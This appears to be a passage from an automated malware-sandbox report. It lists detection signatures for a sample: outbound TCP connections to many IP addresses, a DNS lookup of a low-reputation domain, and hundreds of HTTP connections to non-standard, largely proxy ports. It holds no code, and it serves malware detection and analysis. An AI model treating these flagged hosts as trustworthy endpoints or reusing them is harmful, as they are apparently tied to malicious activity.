                      Source: global trafficTCP traffic: 51.15.21.216 ports 64202,62389,63425,61810,2,3,4,5,6,51448
                      Source: global trafficTCP traffic: 67.43.236.19 ports 1,2,3,5,32175,7,10587
                      Source: global trafficTCP traffic: 213.136.78.200 ports 28513,0,40927,2,4,7,9
                      Source: global trafficTCP traffic: 67.43.236.20 ports 25947,8333,20695,14133,23409,1143,32163,33175,26591,14699,10851,18657,25181,31619,26169,20627,0,2,1741,3203,5,25431,1585,6,22681,11199,9,32061,11129,2685,31979,10671,5953,6605,11049,11489,32989,18841,29619,9053,27879,16829,27075,32177,2455,28643,10121,16349,1849
                      Source: global trafficTCP traffic: 72.10.164.178 ports 25823,31871,30389,1731,13005,13145,32823,31831,26193,25639,19771,5497,8521,23213,3251,2481,25757,20325,0,12529,2,10801,5,7,10121,9,1707,29053,29075,5901
                      Source: global trafficTCP traffic: 171.244.140.160 ports 23867,42456,44233,42968,56076,0,5,6,53882,7,37400,9537,17525
                      Source: global trafficTCP traffic: 31.200.242.201 ports 12196,4531,9985,1,2,6,15755,9
                      Source: global trafficTCP traffic: 5.183.179.117 ports 45698,4,5,6,8,9
                      Source: global trafficTCP traffic: 43.153.133.208 ports 15673,1,3,5,6,7
                      Source: global trafficTCP traffic: 167.86.69.142 ports 37172,46411,49369,35196,46859,1,2,3,7,32947,33912
                      Source: global trafficTCP traffic: 104.194.8.163 ports 20435,0,2,3,4,5
                      Source: global trafficTCP traffic: 176.37.21.46 ports 41890,0,1,4,8,9
                      Source: global trafficTCP traffic: 162.0.220.222 ports 8776,64731,53242,2,3,4,5
                      Source: global trafficTCP traffic: 109.107.181.245 ports 33042,33190,33070,32578,2,3,4,30052,34288,33056,8,32855
                      Source: global trafficTCP traffic: 91.134.140.160 ports 16487,57320,27207,9141,0,32588,2,11946,4,8879,5401,9,49042,12217
                      Source: global trafficTCP traffic: 185.129.250.183 ports 14462,32284,26777,2,3,4,8
                      Source: global trafficTCP traffic: 72.195.34.60 ports 1,2,3,7,9,27391
                      Source: global trafficTCP traffic: 104.248.151.220 ports 60915,0,1,51040,5,6,59755,9
                      Source: global trafficTCP traffic: 209.216.90.208 ports 37683,20308,31470,0,1,12922,3,4,7,13203
                      Source: global trafficTCP traffic: 208.87.131.151 ports 20971,26939,37110,4682,49314,44288,46663,25369,20754,2,3,5,6,57951,51016,9,37977
                      Source: global trafficTCP traffic: 54.38.179.203 ports 23814,35032,60406,0,4,6,46030
                      Source: global trafficTCP traffic: 208.109.13.93 ports 27877,5190,22401,0,3,4,8,34308
                      Source: global trafficTCP traffic: 79.137.204.161 ports 13892,32381,1,31893,10645,2,3,32862,33992,8,11066,30545
                      Source: global trafficTCP traffic: 162.0.220.234 ports 8776,11919,53242,2,3,4,5,44196
                      Source: global trafficTCP traffic: 92.205.110.118 ports 46327,27425,59150,0,1,54440,3,60314,4,6,31396
                      Performs DNS queries to domains with low reputation
                      Source: DNS query: mail.supplyvan.xyz
                      Uses known network protocols on non-standard ports
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 8083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 50
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 3080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 8888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 53299
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 5022
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 25007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 5032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49868
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49978 -> 8888
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50048 -> 4228
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 8889
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 17317
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50012 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 2020
                      Source: unknownNetwork traffic detected: HTTP traffic on port 4228 -> 50048
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 25007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8888 -> 49978
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 49987
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50072 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 9445
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50198 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50193 -> 33466
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 49922
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50044 -> 7777
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50232 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50073 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50260 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50219 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 33328
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50206 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50203 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 46523
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50052 -> 49524
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 53299
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 25007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 17317
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50334 -> 49579
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50265 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50308 -> 5032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50371 -> 60406
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50266 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50429 -> 6764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50198
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 11673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 56862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50352 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50492 -> 9741
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 39796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50463 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50510 -> 8000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50509 -> 41866
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 9002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 50219
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 9251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50572 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7777 -> 50044
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50382 -> 32650
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 17270
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50416 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50326 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50559 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50073
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50383 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50591 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50590 -> 6467
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50480 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50407 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50604 -> 15419
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50601 -> 31280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50449 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50607 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8443 -> 50203
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8000 -> 50510
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50564 -> 11
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 20132
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9741 -> 50492
                      Source: unknownNetwork traffic detected: HTTP traffic on port 6764 -> 50429
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49579 -> 50334
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 6432
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50797 -> 9764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50716 -> 13326
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49932 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50591
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50757 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 46523
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 9445
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 44957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 15084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50733 -> 8291
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50736 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50594 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50831 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 54368
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 9999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 6467 -> 50590
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 17317
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50752 -> 999
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 11673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50498 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50725 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50815 -> 5032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50766 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 56862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50717 -> 35618
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50715 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50812 -> 128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50880 -> 9764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50145 -> 33328
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50480
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50845 -> 35860
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50041 -> 15303
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50720 -> 9002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50490 -> 39796
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50869 -> 31280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50872 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50728 -> 8000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50868 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50077 -> 23859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 9002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 20132
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 9251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50769 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50184 -> 38080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50860 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3129 -> 50586
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50787 -> 53882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50902 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50901 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50201 -> 44612
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50852 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50014 -> 7890
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50212 -> 35982
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 32988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50863 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50821 -> 8089
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50865 -> 8088
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50934 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50947 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51013 -> 9764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50207 -> 16379
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50181 -> 56367
                      Source: unknownNetwork traffic detected: HTTP traffic on port 128 -> 50812
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50031 -> 60083
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50957 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50129 -> 4441
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50988 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 48425
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50251 -> 54395
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51035 -> 9180
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51009 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51002 -> 8291
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51073 -> 38080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 41649
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50255 -> 46015
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 44957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51020 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 15084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50143 -> 7878
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51070 -> 15303
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50383 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51072 -> 31280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51092 -> 9764
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50808 -> 7302
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51074 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51055 -> 9090
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51075 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 34644
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 11673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50269 -> 46523
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 50720
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50979 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50498
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50234 -> 8181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 53299
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50700 -> 20132
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50192 -> 17525
                      Source: unknownNetwork traffic detected: HTTP traffic on port 32650 -> 50382
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51094 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51077 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50995 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 54368
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7890 -> 50014
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 32988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50486 -> 56862
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 50326
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51093 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51121 -> 38080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50695 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50393 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50428 -> 8730
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51103 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51106 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51084 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9002 -> 49969
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51114 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51060 -> 36457
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51087 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50470 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50431 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50491 -> 53948
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51079 -> 9091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50299 -> 2002
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50545 -> 9251
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51115 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51091 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50583 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51017 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51150 -> 15303
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51135 -> 5032
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51153 -> 31280
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51177 -> 38080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50717 -> 35618
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51140 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50354 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51143 -> 8291
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51164 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51151 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51198 -> 54467
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51105 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 18080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51126 -> 8443
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50784 -> 44957
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51043 -> 41649
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51187 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51174 -> 128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51145 -> 8193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50971 -> 32988
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50543 -> 27877
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51199 -> 31633
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50682 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50697 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51127 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51224 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51190 -> 46859
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51293 -> 8000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50017 -> 9445
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50758 -> 15084
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51249 -> 7757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51235 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51175 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51250 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50769 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50787 -> 53882
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8089 -> 50821
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51264 -> 34139
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50562 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51279 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51232 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51295 -> 41920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50656 -> 11232
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50010 -> 17317
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50768 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51359 -> 19072
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50818 -> 31654
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50837 -> 57728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50829 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51366 -> 34409
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50 -> 49734
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51167 -> 5678
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51376 -> 43840
                      Source: unknownNetwork traffic detected: HTTP traffic on port 9091 -> 51079
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51344 -> 33190
                      Source: unknownNetwork traffic detected: HTTP traffic on port 128 -> 51174
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51051 -> 48606
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51401 -> 15303
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50835 -> 8088
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51091
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51085 -> 19404
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51422 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51273 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50698 -> 32650
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51306 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50791 -> 54368
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50914 -> 64947
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50888 -> 27391
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51326 -> 2019
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51113 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50884 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 7302 -> 50808
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50823 -> 1976
                      Source: unknownNetwork traffic detected: HTTP traffic on port 19072 -> 51359
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51438 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50886 -> 6049
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51405 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50949 -> 28106
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51111 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51449 -> 8118
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51436 -> 4153
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51452 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51439 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50919 -> 34405
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51358 -> 82
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51227 -> 8181
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50928 -> 18936
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51468 -> 6539
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51409 -> 7302
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51469 -> 46451
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51393 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51390 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 3128 -> 51175
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51474 -> 9000
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51435 -> 15673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51199 -> 31633
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51487 -> 4145
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51485 -> 2692
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51249 -> 7757
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50466 -> 11673
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51506 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51510 -> 31654
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51509 -> 57728
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8889 -> 49923
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51497 -> 40186
                      Source: unknownNetwork traffic detected: HTTP traffic on port 8118 -> 51449
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51519 -> 23814
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51243 -> 3128
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50922 -> 1111
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51476 -> 8193
                      Source: unknownNetwork traffic detected: HTTP traffic on port 2020 -> 49939
                      Source: unknownNetwork traffic detected: HTTP traffic on port 43840 -> 51376
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51264 -> 34139
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51295 -> 41920
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51513 -> 1080
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50953 -> 3129
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51498 -> 8081
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51081 -> 60404
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51296 -> 30007
                      Source: unknownNetwork traffic detected: HTTP traffic on port 51548 -> 64052
                      Source: unknownNetwork traffic detected: HTTP traffic on port 50994 -> 29603
